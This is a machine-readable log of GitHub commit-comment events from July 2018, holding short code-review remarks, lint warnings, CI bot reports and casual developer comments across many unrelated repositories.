{"id":"8014133513","type":"CommitCommentEvent","actor":{"login":"elextr"},"repo":{"name":"asciidoc/asciidoc"},"payload":{"comment":{"id":29823813,"position":null,"line":null,"path":null,"commit_id":"27df6dd0dcb4d0b58913f0ff436785a0b8992077","created_at":"2018-07-25T04:41:07Z","updated_at":"2018-07-25T04:41:07Z","author_association":"CONTRIBUTOR","body":"This implementation of Asciidoc is intended to be stable and is only available for backward support of existing users who have an infrastructure investment based on it.  As such we don't know what versions of Python any users have, and would not want to artificially limit them for the reason of a particular non-compliant Python 2 install.\r\n\r\nBecause Python 2 will EOL Jan 2020 this implementation is no longer recommended for new users, see https://github.com/asciidoc/asciidoc-py3 or https://asciidoctor.org/ for alternative implementations."}},"created_at":"2018-07-25T04:41:07Z"}
{"id":"8014138454","type":"CommitCommentEvent","actor":{"login":"jhchon"},"repo":{"name":"SchoolGame/Cogi_Lion"},"payload":{"comment":{"id":29823817,"position":4,"line":3,"path":"README.md","commit_id":"63e61351b1be6e516c42842c5dbe6e198e651e86","created_at":"2018-07-25T04:43:09Z","updated_at":"2018-07-25T04:43:09Z","author_association":"CONTRIBUTOR","body":"이런건 이렇게 바꿔주세요\r\n"}},"created_at":"2018-07-25T04:43:09Z"}
{"id":"8014139446","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29823818,"position":null,"line":null,"path":null,"commit_id":"96b0cd3c60986a8b64e6382095d1e59de456f599","created_at":"2018-07-25T04:43:33Z","updated_at":"2018-07-25T04:43:33Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3207 "}},"created_at":"2018-07-25T04:43:33Z"}
{"id":"8014141798","type":"CommitCommentEvent","actor":{"login":"siddharth178"},"repo":{"name":"rapidloop/pgmetrics"},"payload":{"comment":{"id":29823819,"position":12,"line":158,"path":"cmd/pgmetrics/main.go","commit_id":"cb41f94e47f00b24205883c626caf5593e486711","created_at":"2018-07-25T04:44:33Z","updated_at":"2018-07-25T04:44:33Z","author_association":"NONE","body":"Done. 43a55750c1235b874b1d3d247eb27420ba7cdf40"}},"created_at":"2018-07-25T04:44:33Z"}
{"id":"8014142408","type":"CommitCommentEvent","actor":{"login":"siddharth178"},"repo":{"name":"rapidloop/pgmetrics"},"payload":{"comment":{"id":29823822,"position":7,"line":115,"path":"collect.go","commit_id":"cb41f94e47f00b24205883c626caf5593e486711","created_at":"2018-07-25T04:44:49Z","updated_at":"2018-07-25T04:44:49Z","author_association":"NONE","body":"Done. 43a55750c1235b874b1d3d247eb27420ba7cdf40"}},"created_at":"2018-07-25T04:44:49Z"}
{"id":"8014142509","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29823823,"position":null,"line":null,"path":null,"commit_id":"f4d4e0019294e6ba993a650bf564236f21954730","created_at":"2018-07-25T04:44:52Z","updated_at":"2018-07-25T04:44:52Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3207 "}},"created_at":"2018-07-25T04:44:52Z"}
{"id":"8014143550","type":"CommitCommentEvent","actor":{"login":"jeffreyfjia"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29823829,"position":null,"line":null,"path":null,"commit_id":"18f9364ab0d4205d5fba8fe9df90a72a6433036b","created_at":"2018-07-25T04:45:16Z","updated_at":"2018-07-25T04:45:16Z","author_association":"NONE","body":"1.5.82小米盒子，用此工具无法root"}},"created_at":"2018-07-25T04:45:16Z"}
{"id":"8014148457","type":"CommitCommentEvent","actor":{"login":"qwazwsx"},"repo":{"name":"qwazwsx/c4-offline"},"payload":{"comment":{"id":29823830,"position":null,"line":null,"path":null,"commit_id":"4762f98679c9de33d18bc1d98da8d5665af0b5c9","created_at":"2018-07-25T04:47:19Z","updated_at":"2018-07-25T04:47:19Z","author_association":"OWNER","body":"😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂😂👏👏👏👏👏👏👏👏👏👏👏👏👏👏👏👏👏👏👏👏👏👏👏\r\n\r\n\r\n"}},"created_at":"2018-07-25T04:47:19Z"}
{"id":"8014148903","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_device_samsung_scx35-common"},"payload":{"comment":{"id":29823831,"position":13,"line":37,"path":"hidl.mk","commit_id":"d97be56d43e5ae090672401ffa0811281c75fec8","created_at":"2018-07-25T04:47:30Z","updated_at":"2018-07-25T04:47:30Z","author_association":"CONTRIBUTOR","body":"What is this :D"}},"created_at":"2018-07-25T04:47:30Z"}
{"id":"8014153125","type":"CommitCommentEvent","actor":{"login":"billziss-gh"},"repo":{"name":"asciidoc/asciidoc"},"payload":{"comment":{"id":29823835,"position":null,"line":null,"path":null,"commit_id":"27df6dd0dcb4d0b58913f0ff436785a0b8992077","created_at":"2018-07-25T04:49:19Z","updated_at":"2018-07-25T04:49:19Z","author_association":"NONE","body":"@elextr understood. I use asciidoctor myself most of the time, but I occasionally use asciidoc for compatibility reasons.\r\n\r\nI just wanted to bring this problem to your attention, but I understand the reasons for your commit.\r\n\r\nThanks."}},"created_at":"2018-07-25T04:49:19Z"}
{"id":"8014153158","type":"CommitCommentEvent","actor":{"login":"kmhabib71bd"},"repo":{"name":"kmhabib71bd/data-science-python"},"payload":{"comment":{"id":29823836,"position":null,"line":null,"path":null,"commit_id":"c6dc0abe484f8e0556ab2bdfe161371e14089621","created_at":"2018-07-25T04:49:20Z","updated_at":"2018-07-25T04:49:20Z","author_association":"OWNER","body":"+>>> df.recency\r\n+>>> df['recency']\r\n+>>> df[['recency']]\r\n+>>> df.loc[:, 'recency']\r\n+>>> df.loc[:, ['recency']]\r\n+>>> df.iloc[:, 0]\r\n+>>> df.iloc[:, [0]]"}},"created_at":"2018-07-25T04:49:20Z"}
{"id":"8014153394","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29823837,"position":null,"line":null,"path":null,"commit_id":"5b8d798be41f3ff448ca6ea697ac9c8ca879522f","created_at":"2018-07-25T04:49:27Z","updated_at":"2018-07-25T04:49:27Z","author_association":"MEMBER","body":"How about more international radio stations?"}},"created_at":"2018-07-25T04:49:27Z"}
{"id":"8014157446","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29823840,"position":203,"line":null,"path":"app/src/at-trivo/java/asiantech/internship/summer/canvas/WildlifeChartView.java","commit_id":"93f3b3175407816dbd9edc5c1a1498720c2ceed2","created_at":"2018-07-25T04:51:08Z","updated_at":"2018-07-25T04:51:08Z","author_association":"NONE","body":"WARNING: [IfStmtsMustUseBraces] Avoid using if statements without curly braces\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/braces.html#IfStmtsMustUseBraces"}},"created_at":"2018-07-25T04:51:08Z"}
{"id":"8014157451","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29823841,"position":221,"line":null,"path":"app/src/at-trivo/java/asiantech/internship/summer/canvas/WildlifeChartView.java","commit_id":"93f3b3175407816dbd9edc5c1a1498720c2ceed2","created_at":"2018-07-25T04:51:08Z","updated_at":"2018-07-25T04:51:08Z","author_association":"NONE","body":"WARNING: [IfStmtsMustUseBraces] Avoid using if statements without curly braces\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/braces.html#IfStmtsMustUseBraces"}},"created_at":"2018-07-25T04:51:08Z"}
{"id":"8014157455","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29823842,"position":222,"line":null,"path":"app/src/at-trivo/java/asiantech/internship/summer/canvas/WildlifeChartView.java","commit_id":"93f3b3175407816dbd9edc5c1a1498720c2ceed2","created_at":"2018-07-25T04:51:08Z","updated_at":"2018-07-25T04:51:08Z","author_association":"NONE","body":"WARNING: [IfStmtsMustUseBraces] Avoid using if statements without curly braces\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/braces.html#IfStmtsMustUseBraces"}},"created_at":"2018-07-25T04:51:08Z"}
{"id":"8014162998","type":"CommitCommentEvent","actor":{"login":"CodeTyro"},"repo":{"name":"CodeTyro/sm-media-mining"},"payload":{"comment":{"id":29823853,"position":null,"line":null,"path":null,"commit_id":"6582d4efc60a455013c415482855d70b817ba5b1","created_at":"2018-07-25T04:53:25Z","updated_at":"2018-07-25T04:53:25Z","author_association":"OWNER","body":"Using the notoriously fickle Twitter API to harvest tweets from a handle and also harvest a particular Twitter handle followers. The collected data is stored a .csv file."}},"created_at":"2018-07-25T04:53:25Z"}
{"id":"8014163385","type":"CommitCommentEvent","actor":{"login":"virginiayung"},"repo":{"name":"virginiayung/scipy_proceedings"},"payload":{"comment":{"id":29823855,"position":127,"line":182,"path":"papers/virginia_ng/Scipy2018_first_draft.rst","commit_id":"2458d2aa294aced1785394660c3ea434b4493fd1","created_at":"2018-07-25T04:53:34Z","updated_at":"2018-07-25T04:53:34Z","author_association":"OWNER","body":"> **Merging multiple polygons.** The merge tool [merge]_ combines polygons that are nearly overlapping, such as those that represent a single feature broken by tile boundaries, into a single polygon. See Figure 12\r\n\r\n**Merging multiple polygons.** The merge tool [merge]_ combines polygons that are nearly overlapping, such as those that represent a single feature broken by tile boundaries, into a single polygon. See Figure 12.\r\n\r\n🔪 Figure 13"}},"created_at":"2018-07-25T04:53:34Z"}
{"id":"8014165417","type":"CommitCommentEvent","actor":{"login":"740291272"},"repo":{"name":"740291272/740291272.github.io"},"payload":{"comment":{"id":29823856,"position":null,"line":null,"path":null,"commit_id":"d86b30b083972f3e3730649ae2b33e019c359d5c","created_at":"2018-07-25T04:54:22Z","updated_at":"2018-07-25T04:54:22Z","author_association":"OWNER","body":"？？？"}},"created_at":"2018-07-25T04:54:22Z"}
{"id":"8014168169","type":"CommitCommentEvent","actor":{"login":"muxiaozi"},"repo":{"name":"TheThreeDog/GluttonousSnake"},"payload":{"comment":{"id":29823862,"position":null,"line":null,"path":null,"commit_id":"de0ed6f54ff646f33814a2a21045411a072bd47d","created_at":"2018-07-25T04:55:31Z","updated_at":"2018-07-25T04:55:31Z","author_association":"NONE","body":"雪碧给你多少广告费，我可口可乐给双倍"}},"created_at":"2018-07-25T04:55:31Z"}
{"id":"8014172680","type":"CommitCommentEvent","actor":{"login":"gwolf2u"},"repo":{"name":"crdroidandroid/android_device_oneplus_msm8998-common"},"payload":{"comment":{"id":29823869,"position":null,"line":null,"path":null,"commit_id":"969a0289b69e19ec4c425ed1653825fa488acfc9","created_at":"2018-07-25T04:57:18Z","updated_at":"2018-07-25T04:57:18Z","author_association":"MEMBER","body":"reason?"}},"created_at":"2018-07-25T04:57:18Z"}
{"id":"8014177423","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_device_samsung_scx35-common"},"payload":{"comment":{"id":29823877,"position":13,"line":37,"path":"hidl.mk","commit_id":"d97be56d43e5ae090672401ffa0811281c75fec8","created_at":"2018-07-25T04:59:19Z","updated_at":"2018-07-25T04:59:19Z","author_association":"OWNER","body":"My derp. Fixed already on another random commit XD"}},"created_at":"2018-07-25T04:59:19Z"}
{"id":"8014177907","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29823879,"position":null,"line":null,"path":null,"commit_id":"6ae183722443f69d61fc60dd1a81e920d3b1c31a","created_at":"2018-07-25T04:59:30Z","updated_at":"2018-07-25T04:59:30Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-25T04:59:30Z"}
{"id":"8014177921","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29823880,"position":null,"line":null,"path":null,"commit_id":"f094a5e6f9e6d7d5e1495812f1a3e4497fdf8892","created_at":"2018-07-25T04:59:30Z","updated_at":"2018-07-25T04:59:30Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-25T04:59:30Z"}
{"id":"8014184353","type":"CommitCommentEvent","actor":{"login":"kukulich"},"repo":{"name":"slevomat/coding-standard"},"payload":{"comment":{"id":29823892,"position":13,"line":13,"path":"tests/Sniffs/Classes/data/traitUseDeclarationErrors.fixed.php","commit_id":"d7347f9c16a4085ee1fb2a4a6a4819e551c9dcdd","created_at":"2018-07-25T05:01:50Z","updated_at":"2018-07-25T05:01:50Z","author_association":"CONTRIBUTOR","body":"I’ve never used coflicts resolutions so I was lazy to make them fixable too."}},"created_at":"2018-07-25T05:01:50Z"}
{"id":"8014188368","type":"CommitCommentEvent","actor":{"login":"zqfang"},"repo":{"name":"zqfang/GSEApy"},"payload":{"comment":{"id":29823898,"position":null,"line":null,"path":null,"commit_id":"830a0a875fdf0ebebe42bfb305bc97b5b253a1ad","created_at":"2018-07-25T05:03:26Z","updated_at":"2018-07-25T05:03:26Z","author_association":"OWNER","body":"fixed #43 "}},"created_at":"2018-07-25T05:03:26Z"}
{"id":"8014191984","type":"CommitCommentEvent","actor":{"login":"JacksonTian"},"repo":{"name":"aliyun-node/agentx"},"payload":{"comment":{"id":29823900,"position":6,"line":6,"path":"lib/orders/check_health.js","commit_id":"6d2b5127c19e8ceb17472ebaddf49bfd94ed99e3","created_at":"2018-07-25T05:04:43Z","updated_at":"2018-07-25T05:04:43Z","author_association":"CONTRIBUTOR","body":"如果是在 egg-agent 中，退出是有风险的吧。"}},"created_at":"2018-07-25T05:04:43Z"}
{"id":"8014192756","type":"CommitCommentEvent","actor":{"login":"rxwei"},"repo":{"name":"google/swift-jupyter"},"payload":{"comment":{"id":29823901,"position":13,"line":38,"path":"EnableIPythonDisplay.swift","commit_id":"f3e52ed7fe6be5f38d469303083b530b8bc24417","created_at":"2018-07-25T05:05:03Z","updated_at":"2018-07-25T05:05:03Z","author_association":"MEMBER","body":"No need to wrap lines here. Except for the compiler repo, the column limit is roughly 100 columns."}},"created_at":"2018-07-25T05:05:03Z"}
{"id":"8014194324","type":"CommitCommentEvent","actor":{"login":"hyj1991"},"repo":{"name":"aliyun-node/agentx"},"payload":{"comment":{"id":29823907,"position":6,"line":6,"path":"lib/orders/check_health.js","commit_id":"6d2b5127c19e8ceb17472ebaddf49bfd94ed99e3","created_at":"2018-07-25T05:05:41Z","updated_at":"2018-07-25T05:05:41Z","author_association":"COLLABORATOR","body":"agentx > 200M 本身就意味着出现异常泄漏的可能（timer），此时干掉自身，比吃完系统内存对应用影响小"}},"created_at":"2018-07-25T05:05:41Z"}
{"id":"8014195390","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29823912,"position":null,"line":null,"path":null,"commit_id":"e2d2505943ff98ffb8a9363793d736cb920f2b7a","created_at":"2018-07-25T05:06:07Z","updated_at":"2018-07-25T05:06:07Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - Win64-Windows-7-VisualStudio-14: OK (2947 of 2947 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T05:06:07Z"}
{"id":"8014197129","type":"CommitCommentEvent","actor":{"login":"hyj1991"},"repo":{"name":"aliyun-node/agentx"},"payload":{"comment":{"id":29823916,"position":6,"line":6,"path":"lib/orders/check_health.js","commit_id":"6d2b5127c19e8ceb17472ebaddf49bfd94ed99e3","created_at":"2018-07-25T05:06:52Z","updated_at":"2018-07-25T05:06:52Z","author_association":"COLLABORATOR","body":"昨天那种情况下创建了大量的 socket，占用的不是堆内内存，都是堆外疯长，不会触发 v8 的 OOM，一直等到系统内存吃完后 allocation failed 才 OOM 掉，这种情况下，用户的服务器不能登录，应用实际上也处于不可服务的状态了"}},"created_at":"2018-07-25T05:06:52Z"}
{"id":"8014204324","type":"CommitCommentEvent","actor":{"login":"jiangjiangxiaolong"},"repo":{"name":"jiangjiangxiaolong/Jiangxiaolong"},"payload":{"comment":{"id":29823927,"position":2,"line":2,"path":"README.md","commit_id":"1fc6cd08bfd0939f2069fb5b85b9e1572daa1d48","created_at":"2018-07-25T05:09:56Z","updated_at":"2018-07-25T05:09:56Z","author_association":"OWNER","body":"hello-world"}},"created_at":"2018-07-25T05:09:56Z"}
{"id":"8014205289","type":"CommitCommentEvent","actor":{"login":"Airclean"},"repo":{"name":"Airclean/review-JAVA"},"payload":{"comment":{"id":29823931,"position":null,"line":null,"path":null,"commit_id":"35f473460d66d17af4c499c29603a7883c2bb963","created_at":"2018-07-25T05:10:19Z","updated_at":"2018-07-25T05:10:19Z","author_association":"OWNER","body":"This is a example of CacheImmutable class"}},"created_at":"2018-07-25T05:10:19Z"}
{"id":"8014205692","type":"CommitCommentEvent","actor":{"login":"DiR3Wolf"},"repo":{"name":"snoopyjoe/plugin.video.psvue"},"payload":{"comment":{"id":29823932,"position":null,"line":null,"path":null,"commit_id":"c914b2fc5b504881b87a8f0f7985eda4c7bc20ee","created_at":"2018-07-25T05:10:29Z","updated_at":"2018-07-25T05:10:29Z","author_association":"NONE","body":"@snoopyjoe I just looked at a few news shows that are a good example since they are new and aired less than an hour ago, and it doesn't have this issue. Kind of weird it is just with that show so far. Now, I don't know if this is the case, but some sports events have periods of times where recording is not allowed to be played until X hours later, for example, nba games are not available for 3 hours after live event ends. But if this is the case, then how is the march version different that does allow for it."}},"created_at":"2018-07-25T05:10:29Z"}
{"id":"8014208950","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29823939,"position":10,"line":10,"path":"test/reducers/count.test.ts","commit_id":"97dd39be04ebb82c5ffdc3796ad23fc37617a581","created_at":"2018-07-25T05:11:49Z","updated_at":"2018-07-25T05:11:49Z","author_association":"CONTRIBUTOR","body":"Use `deep` for objects. In case of scalar values it is not needed."}},"created_at":"2018-07-25T05:11:49Z"}
{"id":"8014211199","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29823943,"position":null,"line":null,"path":null,"commit_id":"44799dc42c7a10184d92f14899b8152796f24755","created_at":"2018-07-25T05:12:46Z","updated_at":"2018-07-25T05:12:46Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/96/display/redirect) (on internal Jenkins) failed in stage 'Test docs' 🔥\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/96//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/44799dc42c7a10184d92f14899b8152796f24755/96/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/44799dc42c7a10184d92f14899b8152796f24755/96/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/44799dc42c7a10184d92f14899b8152796f24755/96/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/44799dc42c7a10184d92f14899b8152796f24755/96/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-25T05:12:46Z"}
{"id":"8014217460","type":"CommitCommentEvent","actor":{"login":"opoudjis"},"repo":{"name":"riboseinc/asciidoctor-iso"},"payload":{"comment":{"id":29823953,"position":null,"line":null,"path":null,"commit_id":"f44cea712bd30f0036c13f15038d625c12a7dc40","created_at":"2018-07-25T05:15:21Z","updated_at":"2018-07-25T05:15:21Z","author_association":"MEMBER","body":"So, @strogonoff, would you like me to move all my READMEs to docs/README? "}},"created_at":"2018-07-25T05:15:21Z"}
{"id":"8014217864","type":"CommitCommentEvent","actor":{"login":"SkyeOreo"},"repo":{"name":"DAGfans/DAG_paper"},"payload":{"comment":{"id":29823956,"position":null,"line":null,"path":null,"commit_id":"50932d770a13b71c23ebc0d1036ec0320b9c87d2","created_at":"2018-07-25T05:15:30Z","updated_at":"2018-07-25T05:15:30Z","author_association":"CONTRIBUTOR","body":"I am so sorry that I was not familiar with the operations on Github before.  So I may confuse this folder with others.  I've deleted it. Thanks for your correction."}},"created_at":"2018-07-25T05:15:30Z"}
{"id":"8014220815","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29823961,"position":null,"line":null,"path":null,"commit_id":"380d159b411e97c655c666f44fe876715b9f1834","created_at":"2018-07-25T05:16:37Z","updated_at":"2018-07-25T05:16:37Z","author_association":"COLLABORATOR","body":"Puzzle `303-7eff8043` discovered in   [`CI.md`](  https://github.com/fidals/shopelectro/blob/master/CI.md)   and submitted as #446. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-25T05:16:37Z"}
{"id":"8014222939","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29823962,"position":7,"line":7,"path":"test/iterators/take.test.ts","commit_id":"e679e147a7e8d00419a88c82c71343ce80aaafa7","created_at":"2018-07-25T05:17:24Z","updated_at":"2018-07-25T05:17:24Z","author_association":"CONTRIBUTOR","body":"I'd suggest to add one more corner case:\r\n* When take some elements from an _empty_ array."}},"created_at":"2018-07-25T05:17:24Z"}
{"id":"8014225160","type":"CommitCommentEvent","actor":{"login":"mdmayfield"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29823971,"position":3,"line":3,"path":"test/README.md","commit_id":"4635816a758c0ea565dd8a733274c2eac9fba45b","created_at":"2018-07-25T05:18:17Z","updated_at":"2018-07-25T05:18:17Z","author_association":"OWNER","body":"Testing what happens to a GitHub comment after a branch is rebased to eliminate that commit @mdmayfield"}},"created_at":"2018-07-25T05:18:17Z"}
{"id":"8014226948","type":"CommitCommentEvent","actor":{"login":"AndreyKirichenko"},"repo":{"name":"AndreyKirichenko/ror_beginner"},"payload":{"comment":{"id":29823974,"position":21,"line":21,"path":"lesson_5/instance_counter.rb","commit_id":"656255ca97ea10a3cc08d1fdbd8256319470f1cb","created_at":"2018-07-25T05:19:00Z","updated_at":"2018-07-25T05:19:00Z","author_association":"OWNER","body":"в задании сказано хранить инстансы для Train и Station, не понимаю, зачем еще писать счетчик"}},"created_at":"2018-07-25T05:19:00Z"}
{"id":"8014229337","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29823995,"position":13,"line":18,"path":"lib/iterators/take.ts","commit_id":"e67390a6906b7786f1b7ae1dfc3056b1ed2b2222","created_at":"2018-07-25T05:19:59Z","updated_at":"2018-07-25T05:19:59Z","author_association":"CONTRIBUTOR","body":"`filter` is less optimal then `until`.\r\nIn case of a source of 1000 elements, `take(1)` with `until` will stop after first element, however `filter` will iterate all 1000 elements.\r\n"}},"created_at":"2018-07-25T05:19:59Z"}
{"id":"8014229781","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":29823997,"position":null,"line":null,"path":null,"commit_id":"548260dbaea0be73bdd95174595097078d3f42e2","created_at":"2018-07-25T05:20:10Z","updated_at":"2018-07-25T05:20:10Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-25T05:20:10Z"}
{"id":"8014231810","type":"CommitCommentEvent","actor":{"login":"AndreyKirichenko"},"repo":{"name":"AndreyKirichenko/ror_beginner"},"payload":{"comment":{"id":29824000,"position":22,"line":22,"path":"lesson_5/train.rb","commit_id":"656255ca97ea10a3cc08d1fdbd8256319470f1cb","created_at":"2018-07-25T05:20:56Z","updated_at":"2018-07-25T05:20:56Z","author_association":"OWNER","body":"в задании нигде не сказано что номер поезда должен быть уникальный, и не сказано как обрабатывать ситуацию когда пользователь пытается дважды создать поезд с одинаковым номером"}},"created_at":"2018-07-25T05:20:56Z"}
{"id":"8014235013","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824004,"position":4,"line":23,"path":"test/iterators/take.test.ts","commit_id":"c93210487b5c7c8fb7458c341f853944918e39a7","created_at":"2018-07-25T05:22:07Z","updated_at":"2018-07-25T05:22:07Z","author_association":"CONTRIBUTOR","body":"Tests with same name/description are harder to track when they fail.\r\nConsider using unique names for each test.\r\nExample: \r\n`Should return from the tail 5 elements`\r\n`Should return from the tail 1 element`\r\netc."}},"created_at":"2018-07-25T05:22:07Z"}
{"id":"8014254794","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824057,"position":11,"line":11,"path":"test/iterators/shuffle.test.ts","commit_id":"de68b12ea6241944d2e5a19de5553c6939269fd3","created_at":"2018-07-25T05:29:33Z","updated_at":"2018-07-25T05:29:33Z","author_association":"CONTRIBUTOR","body":"Should actually be:\r\n`expect(toArray(iterator).length).to.be.equal(source.length);`\r\ninside `expect` we provide the actual value, and then build an expectation providing our expected assumptions / values.\r\nThis makes sense especially when tests fail and then you see the actual vs expected value."}},"created_at":"2018-07-25T05:29:33Z"}
{"id":"8014258400","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29824072,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-25T05:30:51Z","updated_at":"2018-07-25T05:30:51Z","author_association":"CONTRIBUTOR","body":"@Cazzar you pointed me to dotnet2.0, so I underdand that anything need to be fix and added should go to net20 and not master?"}},"created_at":"2018-07-25T05:30:51Z"}
{"id":"8014259356","type":"CommitCommentEvent","actor":{"login":"velhbxtyrj"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29824073,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-25T05:31:10Z","updated_at":"2018-07-25T05:31:10Z","author_association":"COLLABORATOR","body":"@Shadowss @iopietro I also just checked and everything works as it should: the name of the village is assigned correctly. I checked three types of artifacts: unique, large, small."}},"created_at":"2018-07-25T05:31:10Z"}
{"id":"8014260347","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29824074,"position":null,"line":null,"path":null,"commit_id":"56f6d96bba38799bbc0242940971842c50e5c0e3","created_at":"2018-07-25T05:31:32Z","updated_at":"2018-07-25T05:31:32Z","author_association":"CONTRIBUTOR","body":"In all tests reverse is tested against sorted sources. \r\nConsider reversing an array with elements in random order."}},"created_at":"2018-07-25T05:31:32Z"}
{"id":"8014263399","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29824088,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-25T05:32:41Z","updated_at":"2018-07-25T05:32:41Z","author_association":"MEMBER","body":"Depends on how necessary it is. If it should go into the next bugfix release, then it goes to master"}},"created_at":"2018-07-25T05:32:41Z"}
